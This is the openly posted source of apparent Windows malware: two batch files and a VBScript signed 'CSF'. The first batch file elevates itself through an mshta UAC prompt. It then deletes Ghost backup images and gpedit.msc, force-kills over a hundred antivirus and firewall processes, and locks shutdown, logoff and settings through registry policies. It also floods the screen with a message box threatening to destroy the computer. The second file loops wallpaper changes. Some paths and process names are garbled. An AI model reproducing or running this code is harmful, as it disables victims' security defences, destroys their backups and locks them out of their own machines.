1.bat:
%1 mshta vbscript:CreateObject(“Shell.Application”).ShellExecute(“cmd.exe”,"/c %~s0 ::","",“runas”,1)(window.close)&&exit
del *.gho
del /f /q /a %systerive%\windows\system32\gpedit.msc
taskkill /f /im WFINDV32.EXE
taskkill /f /im 360*.exe
taskkill /f /im WEBSCANX.EXE
taskkill /f /im VSSTAT.EXE
taskkill /f /im VSHWIN32.EXE
taskkill /f /im VSECOMR.EXE
taskkill /f /im VSCAN40.EXE
taskkill /f /im VETTRAY.EXE
taskkill /f /im VET95.EXE
taskkill /f /im TDS2-NT.EXE
taskkill /f /im TDS2-98.EXE
taskkill /f /im TCA.EXE
taskkill /f /im TBSCAN.EXE
taskkill /f /im SWEEP95.EXE
taskkill /f /im SPHINX.EXE
taskkill /f /im SMC.EXE
taskkill /f /im SERV95.EXE
taskkill /f /im SCRSCAN.EXE
taskkill /f /im SCANPM.EXE
taskkill /f /im SCAN95.EXE
taskkill /f /im SCAN32.EXE
taskkill /f /im SAFEWEB.EXE
taskkill /f /im FESCUE.EXE
taskkill /f /im RAV7WIN.EXE
taskkill /f /im RAV7.EXE
taskkill /f /im PERSFW.EXE
taskkill /f /im PCFWALLICON.EXE
taskkill /f /im PCCWIN98.EXE
taskkill /f /im PAVW.EXE
taskkill /f /im PAVSCHED.EXE
taskkill /f /im PAVCL..EXE
taskkill /f /im PADMIN.EOUTPOST.EXE
taskkill /f /im NVC95.EXE
taskkill /f /im NUPGRADE.EXE
taskkill /f /im NORMIST.EXE
taskkill /f /im NMAIN.EXE
taskkill /f /im NISUM.EXE
taskkill /f /im NAVWNT.EXE
taskkill /f /im NAVW32.EXE
taskkill /f /im NAVNT.EXE
taskkill /f /im NAVLU32.EXE
taskkill /f /im NAVAPW32.EXE
taskkill /f /im N32SCANW.EXE
taskkill /f /im MPFTRAY.EXE
taskkill /f /im MOOLIVE.EXE
taskkill /f /im LUALL.EXE
taskkill /f /im LOOKOUT.EXE
taskkill /f /im LOCKDOWN2000.EXE
taskkill /f /im JEDI.EXE
taskkill /f /im IOMON98.EXE
taskkill /f /im IFACE.EXE
taskkill /f /im ICSUPPNT.EXE
taskkill /f /im ICSUPP95.EXE
taskkill /f /im ICMON.EXE
taskkill /f /im ICLOADNT.EXE
taskkill /f /im ICLOAD95.EXE
taskkill /f /im IBMAVSP.EXE
taskkill /f /im IBMASN.EXE
taskkill /f /im IAMSERV.EXE
taskkill /f /im IAMAPP.EXE
taskkill /f /im FRW.EXE
taskkill /f /im FPROT.EXE
taskkill /f /im FP-WIN.EXE
taskkill /f /im FINDVIRU.EXE
taskkill /f /im F-STOPW.EXE
taskkill /f /im F-PROT95.EXE
taskkill /f /im F-PROT.EXE
taskkill /f /im F-AGNT95.EXE
taskkill /f /im EXPWATCH.EXE
taskkill /f /im ESAFE.EXE
taskkill /f /im ECENGINE.EXE
taskkill /f /im DVP95_0.EXE
taskkill /f /im DVP95.EXE
taskkill /f /im CLEANER3.EXE
taskkill /f /im CLEANER.EXE
taskkill /f /im CLAW95CF.EXE
taskkill /f /im CLAW95.EXE
taskkill /f /im CFINET32.EXE
taskkill /f /im CFINET.EXE
taskkill /f /im CFIAUDIT.EXE
taskkill /f /im CFIADMIN.EXE
taskkill /f /im BLACKICE.EXE
taskkill /f /im BLACKD.EXE
taskkill /f /im AVWUPD32.EXE
taskkill /f /im AVWIN95.EXE
taskkill /f /im AVSCHED32.EXE
taskkill /f /im AVPUPD.EXE
taskkill /f /im AVPTC32.EXE
taskkill /f /im AVPM.EXE
taskkill /f /im AVPDOS32.EXE
taskkill /f /im AVPCC.EXE
taskkill /f /im AVP32.EXE
taskkill /f /im AVP.EXE
taskkill /f /im AVNT.EXE
taskkill /f /im AVKSERV.EXE
taskkill /f /im AVGCTRL.EXE
taskkill /f /im AVE32.EXE
taskkill /f /im AVCONSOL.EXE
taskkill /f /im AUTODOWN.EXE
taskkill /f /im APVXDWIN.EXE
taskkill /f /im ANTI-TROJAN.EXE
taskkill /f /im ACKWIN32.EXE
taskkill /f /im _AVPM.EXE
taskkill /f /im _AVPCC.EXE
taskkill /f /im Navapw32.exe
taskkill /f /im Navapsvc.exe
taskkill /f /im PFW.exe
taskkill /f /im Iparmor.exe
taskkill /f /im KAVsvc.exe
taskkill /f /im KAVsvcUI.exe
taskkill /f /im rising.exe
taskkill /f /im RAVmonD.exe
taskkill /f /im RAVmon.exe
taskkill /f /im RAVtimer.exe
taskkill /f /im rav.exe
taskkill /f /im KVFW.EXE
taskkill /f /im KVsrvXP.exe
taskkill /f /im KVMonXP.exe
taskkill /f /im KVwsc.exe
taskkill /f /im TrojanHunter.exe
taskkill /f /im THGUARD.EXE
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /d 1 /t REG_DWORD /f
RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /d 1 /t REG_DWORD /f
RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoSetFolders" /d 1 /t REG_DWORD /f
RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\MMC\{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}” /v "Restrict-Run" /d 1 /t REG_DWORD /f
RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters
start 2.bat
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
start 1.vbs
rd %systerive%\1..
rd %systerive%\21..
rd %systerive%\321..
rd %systerive%\4321..
rd %systerive%\54321..
rd %systerive%\654321..
rd %systerive%\7654321..
rd %systerive%\87654321..
rd %systerive%\987654321..
rd %systerive%\dfkjgvnfkgvunjdhfkvndmfvnx..
rd %systerive%\dmzjscgdzjsfbhdsbcfdsjhbcvf..
rd %systerive%\dhzjscvdzscgdgznscvdzsngfcvsd..
rd %systerive%\dmhzjscgsygchnsdgchsdgfdzshcfbds..
rd %systerive%\dhjsgyjshgjghsffgdhsfbsbgfdhsfdjhfd..
rd %systerive%\dyzjshgdshjfxdvgcgdvscdhvgcdhgcvhxdvg..
rd %systerive%\cjdvzhfgdvsfjvdsfvhhdfvydsdhscvhsvgcfhg..
rd %systerive%\cdjhasvgshfsvfgjsdvhdvfshdgdgsuycgfdsujgcf..
rd %systerive%\vdfjgvsdfhjdsbfjsefYSdghsbcgfcvscvdshfbvcdf..
2.bat:
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/1.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/2.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/3.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/4.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/5.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/1.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/2.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/3.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/4.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/5.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/1.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/2.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/3.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/4.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/5.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/1.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/2.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/3.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/4.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/5.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/1.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/2.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/3.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/4.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/5.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/1.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/2.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/3.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/4.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/5.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/1.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/2.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/3.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/4.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/5.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/1.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/2.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/3.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/4.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/5.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/1.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/2.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/3.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/4.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/5.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/1.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/2.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/3.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/4.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/5.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/1.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/2.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/3.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/4.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/5.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/1.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/2.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/3.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/4.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/5.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/1.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/2.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/3.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/4.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/5.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/1.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/2.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/3.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/4.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/5.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/1.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/2.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/3.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/4.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/5.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/1.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/2.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/3.png" /f
reg add "hkcu\control panel\desktop" /v wallpaper /d "%systerive/CSF/4.png" /f
1.vbs:
msgbox"破坏你的电脑,我绝对不是开玩笑的!",0,"CSF"